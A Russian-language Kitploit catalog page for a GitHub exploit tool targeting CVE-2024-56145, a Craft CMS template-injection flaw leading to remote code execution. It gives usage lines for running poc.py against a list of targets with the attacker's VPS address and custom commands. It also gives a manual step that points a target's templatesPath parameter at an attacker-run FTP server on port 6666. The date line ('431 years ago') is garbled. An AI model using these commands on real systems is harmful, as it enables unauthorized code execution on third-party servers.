Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-56145-craftcms-rce — CVE-2024-56145 SSTI в RCE - шаблоны twig | Kitploit
Инструменты/GitHubGitHub/sachinart/cve-2024-56145-craftcms-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsachinart/cve-2024-56145-craftcms-rce

CVE-2024-56145-craftcms-rce

CVE-2024-56145 SSTI в RCE - шаблоны twig

Репозиторий
431 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Перед повторным запуском скрипта выполните

fuser -k 6666/tcp

Использование —

python3 poc.py -f targets.txt -i 127.0.0.1 -pr 4 -t 200

Можно использовать пользовательскую команду, например: python3 poc.py -f targets.txt -i 127.0.0.1 -c "whoami"

-i — это ваш IP-адрес или IP вашего VPS (получить его можно с помощью ipconfig / ifconfig.

Пример: python3 poc.py -f targets.txt -i 165.22.104.140 -pr 4 -t 200

Ручная эксплуатация — запустите указанный выше poc.py против нужных целей, вы увидите файл с уязвимыми целями

Что дальше? У вас есть уязвимая цель, но хочется поиграть ещё? Я добавил poc2.py для ручного тестирования цели. Как это сделать? выполните fuser -k 6666/tcp

root@kitploit:~
1. Запустите poc2.py (порт 6666 будет запущен как FTP).
2. Откройте браузер: yourtarget.com/?--templatesPath=ftp://VPS-IP:6666/
3. Вы увидите —

image

Написал Chirag Artani (https://x.com/Chirag99Artani)

Скачать инструмент